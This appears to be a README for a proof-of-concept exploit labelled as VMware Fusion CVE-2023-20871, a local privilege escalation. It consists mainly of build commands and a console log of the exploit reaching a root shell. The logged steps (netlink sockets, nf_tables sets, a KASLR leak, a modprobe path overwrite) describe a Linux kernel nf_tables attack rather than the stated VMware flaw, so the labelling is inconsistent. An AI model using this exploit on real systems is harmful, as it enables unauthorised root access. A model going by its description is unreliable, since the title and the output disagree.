# VMware Fusion Raw Disk local privilege escalation vulnerability
VMware Fusion contains a local privilege escalation vulnerability. A malicious actor with read/write access to the host operating system can elevate privileges to gain root access to the host operating system.

# Usage

chris@experience:~/CVE-2023-20871-poc# make
cc -pthread -static -o poc obj/keyring.o obj/main.o obj/modprobe.o obj/netlink.o obj/nf_tables.o obj/simple_xattr.o obj/uring.o obj/util.o
strip poc
cc -o get_root get_root_src/get_root.c
rm -fr get_root
chris@experience:~/CVE-2023-20871-poc# ./poc
[+] CVE-2023-20871 PoC
[+] Second process currently waiting
[+] Get CAP_NET_ADMIN capability
[+] Netlink socket created
[+] Netlink socket bound
[+] Table table created
[+] Set for the leak created
[+] Set for write primitive created
[+] Leak succeed
[+] kaslr base found 0xffffffff9f000000
[+] physmap base found 0xffff910a00000000
[+] modprobe path changed !
[+] Modprobe payload setup
[?] waitpid
[?] sem_post
[+++] Got root shell, should exit?
# id
uid=0(root) gid=0(root) groups=0(root)